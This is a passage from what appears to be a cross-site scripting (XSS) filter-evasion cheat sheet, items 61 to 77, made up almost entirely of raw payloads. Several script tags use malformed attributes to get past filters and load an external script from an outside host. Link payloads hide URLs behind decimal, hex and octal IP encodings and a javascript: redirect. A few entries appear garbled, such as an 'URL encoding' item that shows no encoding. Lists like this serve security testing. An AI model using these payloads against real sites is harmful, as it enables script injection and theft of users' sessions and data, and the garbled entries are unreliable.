(61) Evading symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h tt p://6 6.000146.0x7.147/"">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Trailing dot for absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>